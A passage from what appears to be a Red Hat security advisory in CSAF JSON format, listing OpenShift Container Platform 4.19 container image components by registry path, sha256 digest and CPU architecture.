"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-docker-builder-rhel9@sha256:6db47ba74f791eb39da7af1862d8978da61cbfd88219441950861ef469cbe472_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-docker-builder-rhel9@sha256:6db47ba74f791eb39da7af1862d8978da61cbfd88219441950861ef469cbe472_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-docker-builder-rhel9@sha256:6db47ba74f791eb39da7af1862d8978da61cbfd88219441950861ef469cbe472_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-docker-builder-rhel9@sha256:6ec129d640af33af43d698593ae543d22394d0b7bb19b2fd89dfd257e5629ba3_s390x as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-docker-builder-rhel9@sha256:6ec129d640af33af43d698593ae543d22394d0b7bb19b2fd89dfd257e5629ba3_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-docker-builder-rhel9@sha256:6ec129d640af33af43d698593ae543d22394d0b7bb19b2fd89dfd257e5629ba3_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-docker-builder-rhel9@sha256:f09043d293b8948f83da5b5722a0edb74ae3f54b58eeea19c490c0112bad2071_ppc64le as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-docker-builder-rhel9@sha256:f09043d293b8948f83da5b5722a0edb74ae3f54b58eeea19c490c0112bad2071_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-docker-builder-rhel9@sha256:f09043d293b8948f83da5b5722a0edb74ae3f54b58eeea19c490c0112bad2071_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-docker-registry-rhel9@sha256:802e9ee888afb88e576fee42f11c7ee0d6fcbfb7b5213df16cac12c2b75a1d7c_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-docker-registry-rhel9@sha256:802e9ee888afb88e576fee42f11c7ee0d6fcbfb7b5213df16cac12c2b75a1d7c_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-docker-registry-rhel9@sha256:802e9ee888afb88e576fee42f11c7ee0d6fcbfb7b5213df16cac12c2b75a1d7c_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-docker-registry-rhel9@sha256:8cc4458a66fce822d175559277398c7aef9ddb383399efaf80650c2f350505fd_ppc64le as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-docker-registry-rhel9@sha256:8cc4458a66fce822d175559277398c7aef9ddb383399efaf80650c2f350505fd_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-docker-registry-rhel9@sha256:8cc4458a66fce822d175559277398c7aef9ddb383399efaf80650c2f350505fd_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-docker-registry-rhel9@sha256:bfbaa99fb697f2a352b97de52a35729481556ac4ad3efadf6b796356a2830fd3_s390x as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-docker-registry-rhel9@sha256:bfbaa99fb697f2a352b97de52a35729481556ac4ad3efadf6b796356a2830fd3_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-docker-registry-rhel9@sha256:bfbaa99fb697f2a352b97de52a35729481556ac4ad3efadf6b796356a2830fd3_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-docker-registry-rhel9@sha256:c1de6ec5108a02b21c15f44308fc3a9b4293f94353c0f25f11576a74fb21ce5d_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-docker-registry-rhel9@sha256:c1de6ec5108a02b21c15f44308fc3a9b4293f94353c0f25f11576a74fb21ce5d_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-docker-registry-rhel9@sha256:c1de6ec5108a02b21c15f44308fc3a9b4293f94353c0f25f11576a74fb21ce5d_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-etcd-rhel9@sha256:622a5b555fb855d565a2c66137c248a239a364c00671d271782695d144d8a56d_ppc64le as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-etcd-rhel9@sha256:622a5b555fb855d565a2c66137c248a239a364c00671d271782695d144d8a56d_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-etcd-rhel9@sha256:622a5b555fb855d565a2c66137c248a239a364c00671d271782695d144d8a56d_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-etcd-rhel9@sha256:640febb01fbe420ea03dcf3cc19bb8d0c9cf26c4af953133d51347baef830441_s390x as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-etcd-rhel9@sha256:640febb01fbe420ea03dcf3cc19bb8d0c9cf26c4af953133d51347baef830441_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-etcd-rhel9@sha256:640febb01fbe420ea03dcf3cc19bb8d0c9cf26c4af953133d51347baef830441_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-etcd-rhel9@sha256:ce22905d9a22de00509343c81f9400e436132912a9ae6ddf675c0928f3ea4d27_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-etcd-rhel9@sha256:ce22905d9a22de00509343c81f9400e436132912a9ae6ddf675c0928f3ea4d27_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-etcd-rhel9@sha256:ce22905d9a22de00509343c81f9400e436132912a9ae6ddf675c0928f3ea4d27_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-etcd-rhel9@sha256:d07ec10275070567596dfccce0a09bd2fbed9d5d452a813f26b1aa3d313b9d71_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-etcd-rhel9@sha256:d07ec10275070567596dfccce0a09bd2fbed9d5d452a813f26b1aa3d313b9d71_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-etcd-rhel9@sha256:d07ec10275070567596dfccce0a09bd2fbed9d5d452a813f26b1aa3d313b9d71_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-gcp-cloud-controller-manager-rhel9@sha256:7ecb1d8a291da4a5113355fb9cd53efbe82879d419678800984d8d2b0b1e2b60_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-cloud-controller-manager-rhel9@sha256:7ecb1d8a291da4a5113355fb9cd53efbe82879d419678800984d8d2b0b1e2b60_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-gcp-cloud-controller-manager-rhel9@sha256:7ecb1d8a291da4a5113355fb9cd53efbe82879d419678800984d8d2b0b1e2b60_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-gcp-cloud-controller-manager-rhel9@sha256:aa490b00e5c8c799fed61101cdcb32447eab6caf4c4c1037f1a7f9b5ee5c2500_ppc64le as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-cloud-controller-manager-rhel9@sha256:aa490b00e5c8c799fed61101cdcb32447eab6caf4c4c1037f1a7f9b5ee5c2500_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-gcp-cloud-controller-manager-rhel9@sha256:aa490b00e5c8c799fed61101cdcb32447eab6caf4c4c1037f1a7f9b5ee5c2500_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-gcp-cloud-controller-manager-rhel9@sha256:ac962f2ec19c1cf0922a5af1d60c6535da0d2bb2e3b1f2bf60f559e7c91fa659_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-cloud-controller-manager-rhel9@sha256:ac962f2ec19c1cf0922a5af1d60c6535da0d2bb2e3b1f2bf60f559e7c91fa659_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-gcp-cloud-controller-manager-rhel9@sha256:ac962f2ec19c1cf0922a5af1d60c6535da0d2bb2e3b1f2bf60f559e7c91fa659_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-gcp-cluster-api-controllers-rhel9@sha256:211d64fbaf9ecb4d767c4fddea4eadf048ff3783ab8aa28bde76844eaa735361_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-cluster-api-controllers-rhel9@sha256:211d64fbaf9ecb4d767c4fddea4eadf048ff3783ab8aa28bde76844eaa735361_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-gcp-cluster-api-controllers-rhel9@sha256:211d64fbaf9ecb4d767c4fddea4eadf048ff3783ab8aa28bde76844eaa735361_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-gcp-cluster-api-controllers-rhel9@sha256:c373f479b51f2bd757cac4f24479cb9056d7745d588cd3a563c364dd63a55d88_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-cluster-api-controllers-rhel9@sha256:c373f479b51f2bd757cac4f24479cb9056d7745d588cd3a563c364dd63a55d88_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-gcp-cluster-api-controllers-rhel9@sha256:c373f479b51f2bd757cac4f24479cb9056d7745d588cd3a563c364dd63a55d88_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-gcp-cluster-api-controllers-rhel9@sha256:fadf5aa90de3fda8b5253c6338406a0eb64866e3f3aab1bfc5f5c0713f3c4277_ppc64le as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-cluster-api-controllers-rhel9@sha256:fadf5aa90de3fda8b5253c6338406a0eb64866e3f3aab1bfc5f5c0713f3c4277_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-gcp-cluster-api-controllers-rhel9@sha256:fadf5aa90de3fda8b5253c6338406a0eb64866e3f3aab1bfc5f5c0713f3c4277_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-operator-rhel9@sha256:b8604b708e45c6b23f0f82a5dca52077d30819e646da9d45cf7f93bcbf58f3ce_ppc64le as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-operator-rhel9@sha256:b8604b708e45c6b23f0f82a5dca52077d30819e646da9d45cf7f93bcbf58f3ce_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-operator-rhel9@sha256:b8604b708e45c6b23f0f82a5dca52077d30819e646da9d45cf7f93bcbf58f3ce_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-operator-rhel9@sha256:e089a7b006efdb5583e05d087a02e0e0416577e913e3d5c6f4cff6918d564436_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-operator-rhel9@sha256:e089a7b006efdb5583e05d087a02e0e0416577e913e3d5c6f4cff6918d564436_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-operator-rhel9@sha256:e089a7b006efdb5583e05d087a02e0e0416577e913e3d5c6f4cff6918d564436_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-operator-rhel9@sha256:eb327d173c6e77b0c6a60c3774ba0246ce5e2df01639e7bbb59952e9b92e65f6_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-operator-rhel9@sha256:eb327d173c6e77b0c6a60c3774ba0246ce5e2df01639e7bbb59952e9b92e65f6_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-operator-rhel9@sha256:eb327d173c6e77b0c6a60c3774ba0246ce5e2df01639e7bbb59952e9b92e65f6_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-rhel9@sha256:7cf202edc41319fe4b36e57b8663292e9cd6a04c632237a5184a0b441dfcf761_ppc64le as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-rhel9@sha256:7cf202edc41319fe4b36e57b8663292e9cd6a04c632237a5184a0b441dfcf761_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-rhel9@sha256:7cf202edc41319fe4b36e57b8663292e9cd6a04c632237a5184a0b441dfcf761_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-rhel9@sha256:b3cb2b6d300c2b2d579c7f8c7f66b52fbc891717e29d7b85c204b518093f529f_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-rhel9@sha256:b3cb2b6d300c2b2d579c7f8c7f66b52fbc891717e29d7b85c204b518093f529f_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-rhel9@sha256:b3cb2b6d300c2b2d579c7f8c7f66b52fbc891717e29d7b85c204b518093f529f_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-rhel9@sha256:b9332849e3b7652afc5dcad447cabeeb884066723a3b174c43fdd39d5651c67e_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-rhel9@sha256:b9332849e3b7652afc5dcad447cabeeb884066723a3b174c43fdd39d5651c67e_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-rhel9@sha256:b9332849e3b7652afc5dcad447cabeeb884066723a3b174c43fdd39d5651c67e_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-gcp-workload-identity-federation-webhook-rhel9@sha256:50f27ddd76331df3b0b34c55391976f546f664f0d7a34130fc57c0d8ba9ee75f_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-workload-identity-federation-webhook-rhel9@sha256:50f27ddd76331df3b0b34c55391976f546f664f0d7a34130fc57c0d8ba9ee75f_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-gcp-workload-identity-federation-webhook-rhel9@sha256:50f27ddd76331df3b0b34c55391976f546f664f0d7a34130fc57c0d8ba9ee75f_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-gcp-workload-identity-federation-webhook-rhel9@sha256:5ff71a6725a51510527d6497b921474a5e735dd4cb53b984ed8af54595b1cd1a_ppc64le as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-workload-identity-federation-webhook-rhel9@sha256:5ff71a6725a51510527d6497b921474a5e735dd4cb53b984ed8af54595b1cd1a_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-gcp-workload-identity-federation-webhook-rhel9@sha256:5ff71a6725a51510527d6497b921474a5e735dd4cb53b984ed8af54595b1cd1a_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-gcp-workload-identity-federation-webhook-rhel9@sha256:70b4576443acce236a5bc1244d7bb7ccd11c22b307e8d302fd0038dfc61efa73_s390x as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-workload-identity-federation-webhook-rhel9@sha256:70b4576443acce236a5bc1244d7bb7ccd11c22b307e8d302fd0038dfc61efa73_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-gcp-workload-identity-federation-webhook-rhel9@sha256:70b4576443acce236a5bc1244d7bb7ccd11c22b307e8d302fd0038dfc61efa73_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-gcp-workload-identity-federation-webhook-rhel9@sha256:c948760bcc0d498230283dc4126370ac9e98eb1d0bdceccdc0a5f20f8b851b9c_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-workload-identity-federation-webhook-rhel9@sha256:c948760bcc0d498230283dc4126370ac9e98eb1d0bdceccdc0a5f20f8b851b9c_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-gcp-workload-identity-federation-webhook-rhel9@sha256:c948760bcc0d498230283dc4126370ac9e98eb1d0bdceccdc0a5f20f8b851b9c_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-haproxy-router-rhel9@sha256:596d00eb17bd6f00e2b26605db7a54bf04425c6a8a188f5a373643530a4c79ca_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-haproxy-router-rhel9@sha256:596d00eb17bd6f00e2b26605db7a54bf04425c6a8a188f5a373643530a4c79ca_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-haproxy-router-rhel9@sha256:596d00eb17bd6f00e2b26605db7a54bf04425c6a8a188f5a373643530a4c79ca_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-haproxy-router-rhel9@sha256:c3fddc9f6c1e96c29dc018fb30d9f70814390cc4b111089264d4cc82378da5ad_ppc64le as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-haproxy-router-rhel9@sha256:c3fddc9f6c1e96c29dc018fb30d9f70814390cc4b111089264d4cc82378da5ad_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-haproxy-router-rhel9@sha256:c3fddc9f6c1e96c29dc018fb30d9f70814390cc4b111089264d4cc82378da5ad_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-haproxy-router-rhel9@sha256:dae117e1d6954cb63417510332fc70b5bafb19e0cc618fc103ef4b6581ecbfdb_s390x as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-haproxy-router-rhel9@sha256:dae117e1d6954cb63417510332fc70b5bafb19e0cc618fc103ef4b6581ecbfdb_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-haproxy-router-rhel9@sha256:dae117e1d6954cb63417510332fc70b5bafb19e0cc618fc103ef4b6581ecbfdb_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-haproxy-router-rhel9@sha256:fb23578b8ce937223392967c69b130551572dfab261815242d42ab090f999853_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-haproxy-router-rhel9@sha256:fb23578b8ce937223392967c69b130551572dfab261815242d42ab090f999853_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-haproxy-router-rhel9@sha256:fb23578b8ce937223392967c69b130551572dfab261815242d42ab090f999853_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-hyperkube-rhel9@sha256:720cd3b89d18772d0230731f18dadae46bdb48b4b83d4c3c2afee787eb966f49_s390x as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-hyperkube-rhel9@sha256:720cd3b89d18772d0230731f18dadae46bdb48b4b83d4c3c2afee787eb966f49_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-hyperkube-rhel9@sha256:720cd3b89d18772d0230731f18dadae46bdb48b4b83d4c3c2afee787eb966f49_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-hyperkube-rhel9@sha256:b207edd030f98804d2dd7a7055b5bb5bfa5008c3c6753ecaffb7fbc0bf18d56a_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-hyperkube-rhel9@sha256:b207edd030f98804d2dd7a7055b5bb5bfa5008c3c6753ecaffb7fbc0bf18d56a_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-hyperkube-rhel9@sha256:b207edd030f98804d2dd7a7055b5bb5bfa5008c3c6753ecaffb7fbc0bf18d56a_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-hyperkube-rhel9@sha256:e3a086f93b62590794af9f69fc273b3125fd88184e8467b3531d02521282ca06_ppc64le as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-hyperkube-rhel9@sha256:e3a086f93b62590794af9f69fc273b3125fd88184e8467b3531d02521282ca06_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-hyperkube-rhel9@sha256:e3a086f93b62590794af9f69fc273b3125fd88184e8467b3531d02521282ca06_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-hyperkube-rhel9@sha256:fb2ea87732bd32c58d57656d38d3393bc7c48bb6edc41bc23464dc25ec2c72b7_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-hyperkube-rhel9@sha256:fb2ea87732bd32c58d57656d38d3393bc7c48bb6edc41bc23464dc25ec2c72b7_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-hyperkube-rhel9@sha256:fb2ea87732bd32c58d57656d38d3393bc7c48bb6edc41bc23464dc25ec2c72b7_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-hypershift-rhel9@sha256:1a62f6e266959b7ac07e5b79dfec40cd78be425a6b394b8201857632067db88d_ppc64le as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-hypershift-rhel9@sha256:1a62f6e266959b7ac07e5b79dfec40cd78be425a6b394b8201857632067db88d_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-hypershift-rhel9@sha256:1a62f6e266959b7ac07e5b79dfec40cd78be425a6b394b8201857632067db88d_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-hypershift-rhel9@sha256:42e9b35962e1716efd05d11f66862be9711397b87be5c16de41ca67e4fb123db_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-hypershift-rhel9@sha256:42e9b35962e1716efd05d11f66862be9711397b87be5c16de41ca67e4fb123db_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-hypershift-rhel9@sha256:42e9b35962e1716efd05d11f66862be9711397b87be5c16de41ca67e4fb123db_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-hypershift-rhel9@sha256:9549947e4c8b0005815e651ebc1cbde8adeed54d89ace772f7c87210624cf587_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-hypershift-rhel9@sha256:9549947e4c8b0005815e651ebc1cbde8adeed54d89ace772f7c87210624cf587_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-hypershift-rhel9@sha256:9549947e4c8b0005815e651ebc1cbde8adeed54d89ace772f7c87210624cf587_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-hypershift-rhel9@sha256:e6ef275bd908e468f74c371734c00cc8e34fda230407b11caca2ca0e4a8cb98a_s390x as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-hypershift-rhel9@sha256:e6ef275bd908e468f74c371734c00cc8e34fda230407b11caca2ca0e4a8cb98a_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-hypershift-rhel9@sha256:e6ef275bd908e468f74c371734c00cc8e34fda230407b11caca2ca0e4a8cb98a_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-ibm-cloud-controller-manager-rhel9@sha256:a02dab2c1d82d33beb22f0d834e89ee5d9d000717c5c9773a86315446222e3d5_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibm-cloud-controller-manager-rhel9@sha256:a02dab2c1d82d33beb22f0d834e89ee5d9d000717c5c9773a86315446222e3d5_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-ibm-cloud-controller-manager-rhel9@sha256:a02dab2c1d82d33beb22f0d834e89ee5d9d000717c5c9773a86315446222e3d5_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-ibm-cloud-controller-manager-rhel9@sha256:b692a262776393fe214b1f5e16690098f0ba9c52da91ef168d67915bd4d915b6_s390x as a component of Red Hat OpenShift Container Platform 4.19",
